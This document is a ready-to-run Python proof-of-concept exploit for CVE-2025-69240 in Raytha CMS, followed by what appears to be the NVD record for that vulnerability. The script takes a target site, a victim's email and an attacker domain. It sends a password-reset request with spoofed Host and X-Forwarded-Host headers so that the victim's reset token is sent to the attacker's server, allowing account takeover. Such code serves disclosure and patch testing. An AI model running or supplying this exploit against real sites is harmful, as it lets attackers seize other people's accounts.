CVE-2025-69240

# CVE-2025-69240 PoC - Raytha CMS Host Header Injection # Description: Attacker spoofs Host/X-Forwarded-Host header to redirect password reset link import requests import argparse from bs4 import BeautifulSoup def exploit_raytha_cms(target_url, victim_email, attacker_domain): """ Exploit CVE-2025-69240 by sending password reset request with spoofed Host header Args: target_url: Base URL of vulnerable Raytha CMS instance victim_email: Email address of the victim attacker_domain: Attacker's controlled domain to capture tokens """ # Step 1: Request password reset with spoofed Host header reset_endpoint = f"{target_url}/auth/password-reset" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded', # Spoof the Host header to redirect password reset link 'X-Forwarded-Host': attacker_domain, 'Host': attacker_domain } data = { 'email': victim_email } print(f"[*] Sending password reset request for {victim_email}") print(f"[*] Spoofed Host header: {attacker_domain}") try: response = requests.post(reset_endpoint, data=data, headers=headers, verify=False) print(f"[+] Password reset request sent") print(f"[*] Check attacker domain logs for incoming token requests") print(f"[*] The victim will receive an email with reset link pointing to: https://{attacker_domain}/auth/password-reset?token=XXX") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-69240 Raytha CMS Host Header Injection') parser.add_argument('--target', required=True, help='Target Raytha CMS URL') parser.add_argument('--email', required=True, help='Victim email address') parser.add_argument('--attacker-domain', required=True, help='Attacker controlled domain') args = parser.parse_args() exploit_raytha_cms(args.target, args.email, args.attacker_domain)

{"cve": {"id": "CVE-2025-69240", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:18:01.207", "lastModified": "2026-03-16T19:30:42.687", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Raytha CMS allows an attacker to spoof `X-Forwarded-Host` or `Host` headers to attacker controlled domain. The attacker (who knows the victim's email address) can force the server to send an email with password reset link pointing to the domain from spoofed header. When victim clicks the link, browser sends request to the attacker’s domain with the token in the path allowing the attacker to capture the token. This allows the attacker to reset victim's password and take over the victim's account.\n\nThis issue was fixed in version 1.4.6."}, {"lang": "es", "value": "Raytha CMS permite a un atacante suplantar los encabezados `X-Forwarded-Host` o `Host` a un dominio controlado por el atacante. El atacante (que conoce la dirección de correo electrónico de la víctima) puede forzar al servidor a enviar un correo electrónico con un enlace de restablecimiento de contraseña que apunta al dominio del encabezado suplantado. Cuando la víctima hace clic en el enlace, el navegador envía una solicitud al dominio del atacante con el token en la ruta, lo que permite al atacante capturar el token. Esto permite al atacante restablecer la contraseña de la víctima y tomar el control de la cuenta de la víctima.\n\nEste problema se solucionó en la versión 1.4.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-348"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:raytha:raytha:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.6", "matchCriteriaId": "4A4FC7D6-F33F-4121-A375-B063263585FD"}]}]}], "references": [{"url": "https://cert.pl/en/posts/2026/03/CVE-2025-69236", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://raytha.com", "source": "[email protected]", "tags": ["Product"]}]}}